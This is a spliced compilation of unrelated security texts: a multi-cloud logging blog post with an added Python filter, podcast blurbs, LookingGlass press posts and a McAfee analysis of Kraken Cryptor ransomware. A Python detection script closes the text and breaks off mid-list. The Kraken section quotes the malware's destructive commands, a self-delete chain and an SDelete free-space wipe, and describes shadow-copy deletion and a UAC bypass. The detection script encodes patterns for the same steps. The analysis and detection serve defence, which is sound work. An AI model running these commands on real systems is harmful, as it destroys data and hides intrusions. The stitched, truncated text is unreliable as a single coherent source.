Source: Glassdoor | IT Career Finder | NIST


Building a Multi-cloud Logging Strategy: Issues and Pitfalls

Posted under: Heavy Research

As we begin our series on Multi-cloud logging, we start with reasons some traditional logging approaches don’t work. I don’t like to start with a negative tone, but we need to point out some challenges and pitfalls which often beset firms on first migration to cloud. That, and it helps frame our other recommendations later in this series. Let’s take a look at some common issues by category.


  • Scale & Performance: Most log management and SIEM platforms were designed and first sold before anyone had heard of clouds, Kafka, or containers. They were architected for ‘hub-and-spoke’ deployments on flat networks, when ‘Scalability’ meant running on a bigger server. This is important because the infrastructure we now monitor is agile – designed to auto-scale up when we need processing power, and back down to reduce costs. The ability to scale up, down, and out is essential to the cloud, but often missing from older logging products which require manual setup, lacking full API enablement and auto-scale capability.
  • Data Sources: We mentioned in our introduction that some common network log sources are unavailable in the cloud. Conversely, as automation and orchestration of cloud resources happen via API calls, API logs become an important source. Data formats for these new log sources may change, as do the indicators used to group events or users within logs. For example, servers in auto-scale groups may share a common IP address, and functions and other ‘serverless’ infrastructure are ephemeral, making it impossible to differentiate one instance from the next this way. So your tools need to ingest new types of logs, faster, and change their threat detection methods by source.
  • Identity: Understanding who did what requires understanding identity. An identity may be a person, service, or device. Regardless, the need to map it, and perhaps correlate it across sources, becomes even more important in hybrid and multi-cloud environments.
  • Volume: When SIEM first began making the rounds, there were only so many security tools and they were pumping out only so many logs. Between new security niches and new regulations, the array of log sources sending unprecedented amounts of logs to collect and analyze grows every year. Moving from traditional AV to EPP, for example, brings with it a huge log volume increase. Add in EDR logs and you’re really into some serious volumes. On the server side, moving from network and server logs to add application layer and container logs brings a non-trivial increase in volume. There are only so many tools designed to handle modern event rates (X billion events per day) and volumes (Y terabytes per day) without buckling under the load, and more importantly, there are only so many people who know how to deploy and operate them in production. While storage is plentiful and cheap in the cloud, you still need to get those logs to the desired storage from various on-premise and cloud sources – perhaps across IaaS, PaaS, and SaaS. If you think that’s easy, call your SaaS vendor and ask how to export all your logs from their cloud into your preferred log store (S3/ADLS/GCS/etc.). That old saw from Silicon Valley, “But does it scale?”, is funny but really applies in some cases.
  • Bandwidth: While we’re on the topic of ridiculous volumes, let’s discuss bandwidth. Network bandwidth and transport layer security between on-premise and cloud and inter-cloud is non-trivial. There are financial costs, as well as engineering and operational considerations. If you don’t believe me ask your AWS or Azure sales person how to move, say, 10 terabytes a day between those two. In some cases architecture only allows a certain amount of bandwidth for log movement and transport, so consider this when planning migrations and add-ons.


  • Multi-account Multi-cloud Architectures: Cloud security facilitates things like micro-segmentation, multi-account strategies, closing down all unnecessary network access, and even running different workloads in different cloud environments. This sort of segmentation makes it much more difficult for attackers to pivot if they gain a foothold. It also means you will need to consider which cloud native logs are available, what you need to supplement with other tooling, and how you will stitch all these sources together. Expecting to dump all your events into a syslog style service and let it percolate back on-premise is unrealistic. You need new architectures for log capture, filtering, and analysis. Storage is the easy part.
  • Monitoring “up the Stack”: As cloud providers manage infrastructure, and possibly applications as well, your threat detection focus must shift from networks to applications. This is both because you lack visibility into network operations and because cloud network deployments are generally more secure, prompting attackers to shift focus. Even if you’re used to monitoring the app layer from a security perspective, for example with a big WAF in front of your on-premise servers, do you know whether your vendor has a viable cloud offering? If you’re lucky enough to have one that works in both places, and you can deploy in cloud as well, answer this (before you initiate the project): Where will those logs go, and how will you get them there?
  • Storage vs. Ingestion: Data storage in cloud services, especially object storage, is so cheap it is practically free. And long-term data archival cloud services offer huge cost advantages over older on-premise solutions. In essence we are encouraged to store more. But while storage is cheap, it’s not always cheap to ingest more data into the cloud, because some logging and analytics services charge based upon volume (gigabytes) and event rates (number of events) ingested into the tool/service/platform. Examples are Splunk, Azure Event Hubs, AWS Kinesis, and Google Stackdriver. Many log sources for the cloud are verbose – both in number of events and in the amount of data generated by each. So you will need to architect your solution to be economically efficient, as well as negotiate with your vendors over ingestion of noisy sources such as DNS and proxies. A brief side note on ‘closed’ logging pipelines: Some vendors want to own your logging pipeline on top of your analytics toolset. This may sound convenient because it “just works” (mostly for their business model), but beware lock-in, both in terms of cost overruns from the inability to deduplicate or filter before ingestion (the meter catches every event), and from the opportunity cost of lost analytical capabilities other tools could provide, but not if you can’t feed them a copy of your log stream. The fact that you can afford to move a bunch of logs from place to place doesn’t mean it’s easy. Some logging architectures are not conducive to sending logs to more than one place at a time, and once you are in their system, exporting all logs (not just alerts) to another analytical tool can be incredibly difficult and resource intensive, because events can be ‘cooked’ into a proprietary format which you then have to reverse during export to make sense to other analytical tools.


  • What to Filter and When: Compliance, regulatory, and contractual commitments prompt organizations to log everything and store it all forever (OK, not quite, but just about). And not just in production, but in pre-production, development, and test systems. Combine that with overly chatty cloud logging systems (What do you plan to do with logs of every single API call into and inside your entire cloud?), and you are quickly overloaded. This results in both slower processing and higher costs. Dealing with this problem means deciding what must be kept vs. filtered; what needs to be analyzed vs. captured for posterity; what is relevant today for security analysis and model building vs. irrelevant tomorrow. One of the decision points you’ll want to address early is which data you consider perishable/real-time vs. historical/latency-tolerant.
  • Speed: For several years there has been a movement away from batch processing, and moving to real-time analysis (footnote: batch can be very slow [days] or very fast [micro-batching within 1-2 second windows], so we use ‘batch’ to mean anything not real-time, more like daily or less frequent). Batch mode, as well as normalization and storage prior to analysis, is becoming antiquated. The use of stream processing infrastructure, machine learning, and “stateless security” enable and even facilitate analysis of events as they are received. Changing the process to analyze in real time is needed to keep pace with attackers and fully automated attacks.
  • Automated Response: Many large corporations and government agencies suffered tremendously in 2017 from fast-spreading ‘ransomworms’ (also called ‘nukeware’) such as WannaCry and NotPetya. Response models tuned for stealthy low-and-slow IP and PII exfiltration attacks need revisiting. Once fast-movers execute you cannot detect your way past the grenades they leave in your datacenter. They are very obvious and very loud. The good news is that the cloud model inherently enables micro-segmentation and automated response. The cloud also doesn’t rely on ancient identity and network protocols which enable lateral movement, and which continue to plague even the best on-premise security shops. Don’t forget that bad practices in the cloud won’t save you from even untargeted shenanigans. Remember the MongoDB massacre of January 2017? Fast response to things that look wrong is key to dropping the net on the bad guys as they try to pwn you. Knowing exactly what you have, its known-good state, and how to leverage new cloud capabilities are all advantages the blue team needs to leverage.
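
The Storage vs. Ingestion and What to Filter and When points both come down to one stage that sits in front of the metered analytics tier: decide per event whether it is analyzed in real time, archived only, or dropped, and suppress duplicates before the meter sees them. The following is an added example of mine, not Securosis code and not tied to any vendor’s pipeline; the event schema, the field names and the routing policy are assumptions chosen for illustration, and the sample events are constructed.

```python
import hashlib
import json
from collections import Counter

# Constructed sample events in a simplified, made-up schema (not real logs).
# "ts" is seconds since an arbitrary epoch; "source" names the emitting system.
SAMPLE = [
    {"ts": 0,  "source": "cloudapi", "eventName": "DescribeInstances", "user": "svc-deploy"},
    {"ts": 1,  "source": "cloudapi", "eventName": "DescribeInstances", "user": "svc-deploy"},  # duplicate
    {"ts": 2,  "source": "cloudapi", "eventName": "PutUserPolicy", "user": "alice"},
    {"ts": 3,  "source": "lb", "path": "/healthz", "status": 200, "client": "10.0.0.5"},
    {"ts": 4,  "source": "lb", "path": "/admin", "status": 403, "client": "198.51.100.9"},
    {"ts": 5,  "source": "dns", "qname": "cdn.example.net", "rcode": "NOERROR"},
    {"ts": 6,  "source": "dns", "qname": "x7q2.evil.example", "rcode": "NXDOMAIN"},
    {"ts": 90, "source": "cloudapi", "eventName": "DescribeInstances", "user": "svc-deploy"},  # outside window
]

VOLATILE_FIELDS = {"ts"}            # excluded from the duplicate fingerprint
READ_ONLY_PREFIXES = ("Describe", "List", "Get")   # assumed naming of read-only API calls


def fingerprint(event):
    """Stable hash of the event content minus volatile fields, for deduplication."""
    body = json.dumps({k: v for k, v in event.items() if k not in VOLATILE_FIELDS},
                      sort_keys=True)
    return hashlib.sha256(body.encode()).hexdigest()


def route(event):
    """Return 'drop', 'cold' (archive only) or 'hot' (archive plus real-time analysis).

    Illustrative policy: health checks carry no signal; read-only API calls and
    successful DNS resolutions are kept for forensics but not metered through
    analytics; everything else, including changes and failures, is analyzed now.
    """
    src = event.get("source")
    if src == "lb" and event.get("path") == "/healthz":
        return "drop"
    if src == "cloudapi" and event.get("eventName", "").startswith(READ_ONLY_PREFIXES):
        return "cold"
    if src == "dns" and event.get("rcode") == "NOERROR":
        return "cold"
    return "hot"


class PreIngestFilter:
    """Dedup-then-route stage; tallies events and bytes per destination."""

    def __init__(self, dedup_window=60):
        self.window = dedup_window          # seconds within which a repeat is a duplicate
        self.last_seen = {}                 # fingerprint -> ts of the copy we forwarded
        self.events = Counter()
        self.bytes = Counter()

    def process(self, event):
        fp = fingerprint(event)
        prev = self.last_seen.get(fp)
        if prev is not None and event["ts"] - prev < self.window:
            self.events["dup"] += 1
            return "dup"
        self.last_seen[fp] = event["ts"]
        dest = route(event)
        self.events[dest] += 1
        self.bytes[dest] += len(json.dumps(event, separators=(",", ":")).encode())
        return dest


def run(events, dedup_window=60):
    """Feed events through the filter in time order; returns the filter with its tallies."""
    f = PreIngestFilter(dedup_window)
    for ev in sorted(events, key=lambda e: e["ts"]):
        f.process(ev)
    return f


def metered_share(f):
    """Fraction of forwarded bytes that reach the volume-metered (hot) tier."""
    total = sum(f.bytes.values())
    return f.bytes["hot"] / total if total else 0.0


if __name__ == "__main__":
    result = run(SAMPLE)
    print("events per route:", dict(result.events))
    print("bytes per route: ", dict(result.bytes))
    print(f"share of bytes hitting the metered tier: {metered_share(result):.0%}")
```

The point of keeping the routing decision in one small, reviewable function is that the “cold” events are still stored (object storage is the cheap part) and can be replayed into a second analytics tool later, which is exactly what a closed pipeline that meters and cooks every event on the way in makes hard.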

Again, our point is not to bash older products, but to point out that cloud environments demand you re-think how you use tools and revisit your deployment models. Most can work with re-engineered deployment. We generally prefer to deploy known technologies when appropriate, which helps reduce the skills gap facing most security and IT teams. But in some cases you will find new and different ways to supplement existing logging infrastructure, and likely run multiple analysis capabilities in parallel.

Next up in our series: Multi-cloud logging architectures and design.

-Adrian & Gal


SN 687: Securing the Vending Machine

More Zero-day exploits in Windows 10, publicly exposed Docker Engine APIs, Google's plan to fix Android, the DoD is expanding its existing "Hack the Pentagon" bug-bounty program to include hardware assets, the going rate for DDoS-for-Hire, and Steve has the answer to our vending machine conundrum from last week.

We invite you to read our show notes.

Hosts: Leo Laporte and Steve Gibson

Download or subscribe to this show at

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site:, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.


Risky Business #520 — Tanya Janca talks security in the curriculum

We’ve got a great podcast for you this week. Tanya Janca will be talking about some volunteer work she’s been doing with a Canadian government panel on getting security content into children’s school curriculums.

In this week’s sponsor interview we’ll be talking with Ferruh Mavituna of Netsparker.

They launched Netsparker Cloud a while ago, so now that they have some decent telemetry I wanted to ask Ferruh what he’s found surprising now that he’s sitting on a mountain of scan results. The types of bugs being turned up aren’t really a surprise, but the extent to which old software is a problem was actually pretty surprising to him. He knew it was bad, he says, but he didn’t know it was this bad.

Adam Boileau, as usual, joins the show this week to talk about all the week’s security news:

  • More Chinese MSS officers indicted by the US DoJ
  • ASD chief speaks publicly on 5G Huawei ban
  • China playing funny buggers with BGP
  • Russia is still messing with the US during the midterms
  • Facebook boots more Iranian influence pages
  • New privacy features in Signal
  • Plus much, much more!

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Chinese Intelligence Officers and Their Recruited Hackers and Insiders Conspired to Steal Sensitive Commercial Aviation and Technological Data for Years | OPA | Department of Justice
U.S. charges Chinese intelligence officers for jet engine data hack
Huawei's ban to 5G network 'supported by technical advice', spy agency chief says - ABC News (Australian Broadcasting Corporation)
Canadian security boss ain't afraid of no Huawei, sees no reason for ban • The Register
US bans exports to Chinese DRAM maker citing national security risk | ZDNet
China has been 'hijacking the vital internet backbone of western countries' | ZDNet
Russia Is Meddling In The Midterms. The White House Just Isn't Talking About It.
The Crisis of Election Security - The New York Times
DHS: Election officials inundated, confused by free cyber-security offerings | ZDNet
Facebook removes more Iran-linked accounts, this time targeting the US & UK | ZDNet
We posed as 100 senators to run ads on Facebook. Facebook approved all of them. – VICE News
NYT: Chinese and Russian spies routinely eavesdrop on Trump’s iPhone calls | Ars Technica
North Korea blamed for two cryptocurrency scams, five trading platform hacks | ZDNet
New Signal privacy feature removes sender ID from metadata | Ars Technica
Windows Defender becomes first antivirus to run inside a sandbox | ZDNet
Pakistani bank denies losing $6 million in country's 'biggest cyber attack' | ZDNet
Many CMS plugins are disabling TLS certificate validation... and that's very bad | ZDNet
Twelve malicious Python libraries found and removed from PyPI | ZDNet
How ‘Mr. Hashtag’ Helped Saudi Arabia Spy on Dissidents - Motherboard
Government Spyware Vendor Left Customer, Victim Data Online for Everyone to See - Motherboard
Apple's T2 Security Chip Makes It Harder to Tap MacBook Mics | WIRED
Microsoft Windows zero-day disclosed on Twitter, again | ZDNet
Digital DASH – ICTC - Focus on Information Technology (FIT)

New platform helps enterprises manage third-party cyber risks


BetaNews, Ian Barker, October 30, 2018

Digital transformation means that companies frequently have a host of vendors, suppliers, providers, and subsidiaries, all connected to their network or data, each with the potential to publicly expose customer information, intellectual property, or heavily regulated data.

Without continuous insight into these other networks third-party risks can be hard to assess, leaving businesses open to the possibility of data breaches.

Intelligence-driven security company LookingGlass is launching a new subscription-based monitoring service. This uses threat data along with a team of expert security and intelligence analysts to mitigate risks and provide continuous visibility into potential exposure.

“When it comes to risk, companies have more than just their own perimeters to consider. Every new or existing vendor increases the possibility for exposure that could lead to a breach and impact revenue, brand, and reputation,” says Eric Olson, senior vice president of product at LookingGlass Cyber Solutions. “Changing regulations that require organizations to demonstrate effective identification and management of third party relationships and associated cyber risk add even more layers of complexity to the already time-consuming task of keeping networks secure from a constant barrage of evolving inbound threats. Our Third Party Risk Monitoring service empowers security teams to effectively manage their company’s security posture by delivering the efficient, reliable analysis essential to making strategic, proactive risk management decisions.”

The LookingGlass Third Party Risk Monitoring service can be delivered as a shared or hosted service via LookingGlass or from select partners in the company’s worldwide Cyber Guardian Network. It includes round-the-clock support along with on-boarding and provisioning. In addition to continuous monitoring of third parties, it also performs perpetual scanning of the surface, social, deep, and dark web for both structured and unstructured data, including phishing activity, compromised account credentials, and vulnerabilities in vendor products.

You can find out more on the LookingGlass website.

Savannah Young
Media Associate

The post New platform helps enterprises manage third-party cyber risks appeared first on LookingGlass Cyber Solutions Inc..

NFCA 2018 Annual Training Event

The NFCA will host its 2018 Annual Training Event at the Hilton Mark Center Hotel in Alexandria, Virginia, November 6th-8th. The 2017 conference, which was a resounding success, featured a number of prominent keynote speakers including U.S. Representative and Chairman of the House Committee on Homeland Security Michael McCaul, Attorney General Jeff Sessions and Acting Secretary of Homeland Security Elaine Duke.

Join LookingGlass at this year’s event in booth # 118 to hear innovative ideas and business practices for the purpose of enhancing fusion center capabilities and the National Network’s contribution to public safety. We will see you there!

Our DHS Shared Cybersecurity Services are available to DHS and its components, all Federal Civilian Departments and Agencies (D/As), State Fusion Centers (SFCs), the Multi-State Information Sharing Analysis Center (MS-ISAC), and the Research Education Network Information Sharing Analysis Center (REN-ISAC).

Click below to get an online version of our DHS Cybersecurity Shared Services brochure, and be sure to stop by our booth to get a hardcopy version of the brochure!

Download Brochure

The post NFCA 2018 Annual Training Event appeared first on LookingGlass Cyber Solutions Inc..

2017 cyberattacks proved more numerous, sophisticated, and ruthless than in years past

the cyberwire

LookingGlass Cyber Solutions Software Platform Proactively Manages Third Party Cyber Risks to Business Data and Operations

ScoutPrime™ Capability Delivers Continuous Monitoring and Real-Time Discovery of Elevated Breach Risks, Helping Decision-Makers Take Action and Manage Their Expanded Cyber Attack Surface

October 30th, 2018 – RESTON, Va.–(BUSINESS WIRE)–LookingGlass™ Cyber Solutions, a leader in threat intelligence-driven security, today announced the general availability of its advanced Third Party Risk Monitoring offering. Built on the powerful ScoutPrime platform, the LookingGlass subscription service offering leverages the industry’s most comprehensive threat data along with a team of expert security and intelligence analysts to mitigate risks, provide continuous visibility into potential vendor exposure, and significantly reduce time to action with negligible false positives.


The post 2017 cyberattacks proved more numerous, sophisticated, and ruthless than in years past appeared first on LookingGlass Cyber Solutions Inc..

Kraken Ransomware Emerges from the Depths: How to Tame the Beast

Look out, someone has released the Kraken — or at least a ransomware strain named after it. Kraken Cryptor ransomware first made its appearance back in August, but in mid-September, the malicious beast emerged from the depths disguised as the legitimate antispyware application SuperAntiSpyware. In fact, the attackers behind the ransomware were able to access the website and distribute the ransomware from there.

So how did this stealthy monster recently gain more traction? The McAfee Advanced Threat Research team, along with the Insikt group from Recorded Future, decided to uncover the mystery. They soon found that the Fallout Exploit kit, a type of toolkit cybercriminals use to take advantage of system vulnerabilities, started delivering Kraken ransomware at the end of September. In fact, this is the same exploit kit used to deliver GandCrab ransomware. With this new partnership between Kraken and Fallout, Kraken now has an extra vessel to employ its malicious tactics.

Now, let’s discuss how Kraken ransomware works to encrypt a victim’s computer. Kraken utilizes a business scheme called Ransomware-as-a-Service, or RaaS, which is a platform tool distributed by hackers to other hackers. This tool gives cybercriminals the ability to hold a victim’s computer files, information, and systems hostage. Once the victim pays the ransom, the hacker sends a percentage of the payment to the RaaS developers in exchange for a decryption code to be forwarded to the victim. However, Kraken wipes files from a computer using external tools, making data recovery nearly impossible for the victim. Essentially, it’s a wiper.

Kraken Cryptor ransomware employs a variety of tactics to keep it from being detected by many antimalware products. For example, hackers are given a new variant of Kraken every 15 days to help it slip under an antimalware solution’s radar. The ransomware also uses an exclusion list, a common method utilized by cybercriminals to avoid prosecution. The exclusion list archives all locations where Kraken cannot be used, suggesting that the cybercriminals behind the ransomware attacks reside in those countries. As you can see, Kraken goes to great lengths to cover its tracks, making it a difficult cyberthreat to fight.

Kraken’s goal is to encourage more wannabe cybercriminals to purchase this RaaS and conduct their own attacks, ultimately leading to more money in the developers’ pockets. Our research team observed that in Version 2 of Kraken, developers decreased their profit percentage by 5%, probably as a tactic to attract more affiliate hackers. The more criminal customers Kraken can onboard, the more attacks they can flesh out, and the more they can profit off of ransom collections.

So, what can users do to defend themselves from this stealthy monstrosity? Here are some proactive steps you can take:

  • Be wary of suspicious emails or pop-ups. Kraken was able to gain access to a legitimate website and other ransomware can too. If you receive a message or pop-up claiming to be from a company you trust but the content seems fishy, don’t click on it. Go directly to the source and contact the company from their customer support line.
  • Back up your files often. With cybercrime on the rise, it’s vital to consistently back up all of your important data. If your device becomes infected with ransomware, there’s no guarantee that you’ll get it back. Stay prepared and protected by backing up your files on an external hard drive or in the cloud.
  • Never pay the ransom. Although you may feel desperate to get your data back, paying does not guarantee that all of your information will be returned to you. Paying the ransom also contributes to the development of more ransomware families, so it’s best to just hold off on making any payments.
  • Use a decryption tool. No More Ransom provides tools to help users free their encrypted data. If your device gets held for ransom, check and see if a decryption tool is available for your specific strain of ransomware.
  • Use a comprehensive security solution. Add an extra layer of security on to all your devices by using a solution such as McAfee Total Protection, which now includes ransom guard and will help you better protect against these types of threats.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Kraken Ransomware Emerges from the Depths: How to Tame the Beast appeared first on McAfee Blogs.

Fallout Exploit Kit Releases the Kraken Ransomware on Its Victims

Alexandr Solad and Daniel Hatheway of Recorded Future are coauthors of this post. Read Recorded Future’s version of this analysis. 

Rising from the deep, Kraken Cryptor ransomware has had a notable development path in recent months. The first signs of Kraken came in mid-August on a popular underground forum. In mid-September it was reported that the malware developer had placed the ransomware, masquerading as a security solution, on the website SuperAntiSpyware, infecting systems that tried to download a legitimate version of the antispyware software.

Kraken’s presence became more apparent at the end of September, when the security researcher nao_sec discovered that the Fallout Exploit Kit, known for delivering GandCrab ransomware, also started to deliver Kraken.

The McAfee Advanced Threat Research team, working with the Insikt group from Recorded Future, found evidence of the Kraken authors asking the Fallout team to be added to the Exploit Kit. With this partnership, Kraken now has an additional malware delivery method for its criminal customers.

We also found that the user associated with Kraken ransomware, ThisWasKraken, has a paid account. Paid accounts are not uncommon on underground forums, but usually malware developers who offer services such as ransomware are highly trusted members and are vetted by other high-level forum members. Members with paid accounts are generally distrusted by the community.


Kraken Cryptor’s developers asking to join the Fallout Exploit Kit.

Kraken Cryptor announcement.

The ransomware was announced, in Russian, with the following features:

  • Encoded in C# (.NET 3.5)
  • Small stub size ~85KB
  • Fully autonomous
  • Collects system information as an encrypted message for reference
  • File size limit for encryption
  • Encryption speed faster than ever
  • Uses a hybrid combination of encryption algorithms (AES, RC4, Salsa20) for secure and fast encryption with a unique key for each file
  • Enables the use of a network resource and adds an expansion bypass mode for encrypting all files on non-OS disks
  • Is impossible to recover data using a recovery center or tools without payment
  • Added antidebug, antiforensic methods

Kraken works with an affiliate program, as do ransomware families such as GandCrab. This business scheme is often referred to as Ransomware-as-a-Service (RaaS).

Affiliates are given a new build of Kraken every 15 days to keep the payload fully undetectable by antimalware products. According to ThisWasKraken, when a victim asks for a free decryption test, the affiliate member should send one of the victim’s files with its associated unique key to the Kraken Cryptor ransomware support service. The service will decrypt the file and resend it to the affiliate member to forward to the victim. After the victim pays the full ransom, the affiliate member sends a percentage of the received payment to the RaaS developers to get a decryptor key, which is forwarded to the victim. This system ensures the affiliate pays a percentage to the affiliate program and does not simply pocket the full amount. The cut for the developers offers them a relatively safe way of making a profit without exposing themselves to the risk of spreading ransomware.

We have observed that the profit percentage for the developers has decreased from 25% in Version 1 to 20% in Version 2. The developers might have done this to attract more affiliates. To enter the program, potential affiliates must complete a form and pay $50 to be accepted.

In the Kraken forum post it states that the ransomware cannot be used in the following countries:

  • Armenia
  • Azerbaijan
  • Belarus
  • Estonia
  • Georgia
  • Iran
  • Kazakhstan
  • Kyrgyzstan
  • Latvia
  • Lithuania
  • Moldova
  • Russia
  • Tajikistan
  • Turkmenistan
  • Ukraine
  • Uzbekistan

On October 21, Kraken’s authors released Version 2 of the affiliate program, reflecting the ransomware’s popularity and a fresh release. At the same time, the authors published a map showing the distribution of their victims:

Note that some of the countries on the developers’ exclusion list have infections.

Video promotions

The first public release of Kraken Cryptor was Version 1.2; the latest is Version 2.07. To promote the ransomware, the authors created a video showing its capabilities to potential customers. We analyzed the metadata of the video and believe the authors created it along with the first version, released in August.

In the video, the authors show how fast Kraken can encrypt data on the system:

Kraken ransomware in action.

Actor indications

The Advanced Threat Research team and Recorded Future’s Insikt group analyzed all the forum messages posted by ThisWasKraken. Based on the Russian language used in the posts, we believe ThisWasKraken is neither a native Russian nor English speaker. To make forum posts in Russian, the actor likely uses an automated translation service, suggested by the awkward phrasing indicative of such a service. In contrast, the actor is noticeably more proficient in English, though they make mistakes consistently in both sentence structure and spelling. English spelling errors are also noticeable in the ransom note.

ThisWasKraken is likely part of a team that is not directly involved in the development of the ransomware. The actor’s role is customer facing, through the Jabber account thiswaskraken@exploit[.]im. Communications with ThisWasKraken show that the actor refers all technical issues to the product support team at teamxsupport@protonmail[.]com.


Bitcoin is the only currency the affiliate program uses. Insikt Group identified several wallets associated with the operation. Kraken’s developers appear to have chosen BitcoinPenguin, an online gambling site, as the primary money laundering conduit. It is very uncommon for criminal actors, and specifically ransomware operators, to bypass traditional cryptocurrency exchangers when laundering stolen funds. One of the decisive factors for the unusual choice was likely that BitcoinPenguin does not require identity verification of its members, allowing anyone to maintain an anonymous cryptocurrency wallet.

Although in response to regulatory demands cryptocurrency exchangers continue to stiffen their registration rules, online crypto casinos do not have to follow the same know-your-customer guidelines, providing a convenient loophole for all kinds of money launderers.

Bitcoin transactions associated with Kraken analyzed with the Crystal blockchain tool. The parent Bitcoin wallet is 3MsZjBte81dvSukeNHjmEGxKSv6YWZpphH.

Kraken Cryptor at work

The ransomware encrypts data on the disk very quickly and uses external tools, such as SDelete from the Sysinternals suite, to wipe files and make file recovery harder.

The Kraken Cryptor infection scheme.

The ransomware has implemented a user account control (UAC) bypass using the Windows Event Viewer. This bypass technique is used by other malware families and is quite effective for executing malware.

The technique is well explained in an article by blogger enigma0x3.

We analyzed an early subset of Kraken ransomware samples and determined they were still in the testing phase, adding and removing options. The ransomware has implemented a “protection” to delete itself during the infection phase:

"C:\Windows\System32\cmd.exe" /C ping -n 3 > NUL&&del /Q /F /S "C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe"

This step is to prevent researchers and endpoint protections from catching the file on an infected machine.

Kraken encrypts user files under a random name and drops a ransom note demanding that the victim pay to recover them. McAfee recommends not paying ransoms because doing so contributes to the development of more ransomware families.

Kraken’s ransom note.

Each encrypted file gets a different extension; specific ransomware families often use this technique to bypass endpoint protection systems.

Kraken delivered by the exploit kit bypasses the UAC using Event Viewer, drops a file on the system, and executes it through the UAC bypass method.

The binary delivered by the exploit kit.

When compiling the first versions, the authors of the binary forgot to strip the PDB reference, revealing that the file is related to Kraken Cryptor:

The early versions contained the following path:


Later versions dropped the PDB path together with the Kraken loader.

Using SysInternals tools

One unique feature of this ransomware family is the use of SDelete. Kraken uses a .bat file to perform certain operations, making file recovery much more challenging:

Kraken downloads SDelete from the Sysinternals website, adds the registry key accepting the EULA to avoid the pop-up, and executes it with the following arguments:

sdelete.exe -c -z C

The SDelete batch file makes file recovery much harder by overwriting all free space on the drive with zeros, deleting the Volume Shadow Copies, disabling the recovery reboot option and finally rebooting the system after 300 seconds.
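The host behaviours described in the UAC bypass, self-delete and SDelete passages above, turned into detection logic as an added example (not McAfee's code or Kraken's batch file). It runs over constructed Sysmon-style process-creation records whose field names are an assumption; apart from the self-delete chain quoted above, the command lines it matches are assumed typical Windows commands for those behaviours, not taken from Kraken.

```python
"""Detection rules for the Kraken host behaviours described above (Event Viewer
UAC bypass, self-delete chain, SDelete free-space wipe, shadow-copy deletion,
recovery disabling, delayed reboot). Added example, not McAfee's or Kraken's code;
the records are constructed and, apart from the quoted self-delete chain, the
command lines are assumed typical Windows commands, not Kraken's own."""
import re
from typing import Callable, Dict, List

Event = Dict[str, str]  # keys: image, parent_image, command_line (assumed field names)

def _base(path: str) -> str:
    """Lower-cased file name of a Windows path ('' if the path is empty)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

# cmd /C ping -n N > NUL && del /Q /F /S <dropper>: the self-delete chain quoted above.
SELF_DELETE = re.compile(r"/c\s+ping\s+-n\s+\d+[^&]*&&\s*del\s+(?:/[qfs]\s+){1,3}", re.I)
# "-z <drive>": SDelete zeroing all free space of a drive (sdelete.exe -c -z C).
SDELETE_ZERO = re.compile(r"\s-z\s+[a-z]:?(?:\s|$)", re.I)
# Assumed typical commands for the batch-file behaviours the article describes.
VSS_DELETE = re.compile(r"\bdelete\s+shadows\b", re.I)
RECOVERY_OFF = re.compile(r"\brecoveryenabled\s+no\b", re.I)
REBOOT_FLAG = re.compile(r"(?:^|\s)[/-]r(?:\s|$)", re.I)
REBOOT_DELAY = re.compile(r"(?:^|\s)[/-]t\s+(\d+)", re.I)

def rule_self_delete(ev: Event) -> bool:
    return _base(ev["image"]) == "cmd.exe" and bool(SELF_DELETE.search(ev["command_line"]))

def rule_sdelete_zero_drive(ev: Event) -> bool:
    return (_base(ev["image"]) in ("sdelete.exe", "sdelete64.exe")
            and bool(SDELETE_ZERO.search(ev["command_line"])))

def rule_shadow_copy_deletion(ev: Event) -> bool:
    return _base(ev["image"]) == "vssadmin.exe" and bool(VSS_DELETE.search(ev["command_line"]))

def rule_recovery_disabled(ev: Event) -> bool:
    return _base(ev["image"]) == "bcdedit.exe" and bool(RECOVERY_OFF.search(ev["command_line"]))

def rule_delayed_reboot(ev: Event, min_delay: int = 60) -> bool:
    """A reboot with a long grace period (the article describes 300 s), not an immediate one."""
    cmd = ev["command_line"]
    delay = REBOOT_DELAY.search(cmd)
    return (_base(ev["image"]) == "shutdown.exe" and bool(REBOOT_FLAG.search(cmd))
            and delay is not None and int(delay.group(1)) >= min_delay)

def rule_eventvwr_child(ev: Event) -> bool:
    """Event Viewer normally starts only mmc.exe; any other child is the UAC bypass pattern."""
    return _base(ev.get("parent_image", "")) == "eventvwr.exe" and _base(ev["image"]) != "mmc.exe"

RULES: Dict[str, Callable[[Event], bool]] = {
    "kraken_self_delete": rule_self_delete,
    "sdelete_zero_free_space": rule_sdelete_zero_drive,
    "shadow_copy_deletion": rule_shadow_copy_deletion,
    "recovery_disabled": rule_recovery_disabled,
    "delayed_reboot": rule_delayed_reboot,
    "eventvwr_uac_bypass": rule_eventvwr_child,
}

def classify(ev: Event) -> List[str]:
    """Names of every rule the event matches."""
    return [name for name, rule in RULES.items() if rule(ev)]

def scan(events: List[Event]) -> Dict[str, List[int]]:
    """Map each triggered rule name to the indices of the events that matched it."""
    hits: Dict[str, List[int]] = {}
    for idx, ev in enumerate(events):
        for name in classify(ev):
            hits.setdefault(name, []).append(idx)
    return hits

def looks_like_kraken(hits: Dict[str, List[int]], min_rules: int = 3) -> bool:
    """Several distinct behaviours on one host is the signal; any one alone is noisy."""
    return len(hits) >= min_rules

# Constructed sample events: the first six reproduce the described chain, the last three are benign.
S32 = r"C:\Windows\System32"
TMP = r"C:\Users\Administrator\AppData\Local\Temp"
SAMPLE_EVENTS: List[Event] = [
    {"parent_image": TMP + r"\krakentemp0000.exe", "image": S32 + r"\cmd.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /C ping -n 3 > NUL&&del /Q /F /S "'
                     + TMP + r'\krakentemp0000.exe"'},
    {"parent_image": S32 + r"\eventvwr.exe", "image": r"C:\ProgramData\Safe.exe",
     "command_line": r'"C:\ProgramData\Safe.exe"'},
    {"parent_image": S32 + r"\cmd.exe", "image": r"C:\Users\Public\Sdelete.exe",
     "command_line": r"sdelete.exe -c -z C"},
    {"parent_image": S32 + r"\cmd.exe", "image": S32 + r"\vssadmin.exe",
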